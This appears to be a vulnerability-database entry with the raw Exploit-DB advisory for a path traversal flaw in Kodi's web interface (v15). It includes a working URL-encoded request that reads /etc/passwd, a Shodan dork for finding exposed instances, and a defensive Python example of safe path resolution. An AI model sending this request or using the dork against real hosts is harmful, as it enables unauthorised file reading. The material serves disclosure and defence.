Vendor: Kodi Web Interface
By: mpronk89
CVSS: 4.3 (MEDIUM)
Arbitrary File Access
CWE: 22
Product Name: Kodi Web Interface
Affected Version From: v15
Affected Version To: v16
Patch Exists: YES
Related CWE: N/A
CPE: kodi.tv
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

arbitrary file access kodi web interface

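The Kodi web interface is vulnerable to arbitrary file read through path traversal (CWE-22): URL-encoded slashes (%2f) followed by ".." segments in the request path are decoded and followed outside the directory the web interface serves. An example request that reads the passwd file is <ip>:<port>/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd. This issue was fixed in 2012, reintroduced in February 2015 and fixed again in November 2015 for v16.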

Mitigation:

The issue was fixed in 2012, reintroduced in February 2015 and fixed again in November 2015 for v16.
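
The request pattern from the description, run through a naive path resolver and a hardened one, as an added example (this is not Kodi's code or its actual fix). WEB_ROOT and both function names are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed web root for illustration only; not a path taken from Kodi.
WEB_ROOT = "/srv/webroot"

# The request path quoted in the advisory.
ADVISORY_PATH = ("/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f.."
                 "%2fetc%2fpasswd")


def naive_resolve(request_path):
    """Vulnerable pattern: decode, concatenate, never check containment."""
    return posixpath.normpath(WEB_ROOT + "/" + unquote(request_path))


def safe_resolve(request_path):
    """Hardened pattern: decode first, normalise, then require the result
    to stay inside WEB_ROOT. Returns None when the request is rejected."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(
        posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    # Compare against WEB_ROOT + "/" so a sibling directory such as
    # /srv/webroot-old does not pass a bare prefix test.
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    # On a real filesystem, also resolve symlinks (os.path.realpath)
    # before making this comparison.
    return candidate


if __name__ == "__main__":
    # Constructed sample requests: the advisory path, a normal asset,
    # and a sibling-directory escape.
    for path in (ADVISORY_PATH, "/js/app.js", "/..%2fwebroot-old/x"):
        print(path, "->", naive_resolve(path), "|", safe_resolve(path))
```

The same check applied to access logs flags past requests: any logged path for which safe_resolve returns None is worth reviewing.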
Source

Exploit-DB raw data:

# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a

kodi web interface vulnerable to arbitrary file read.

example:
<ip>:<port>/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd


for passwd

(issue fixed in 2012, reintroduced in February 2015. Fixed again November 2015 for v16)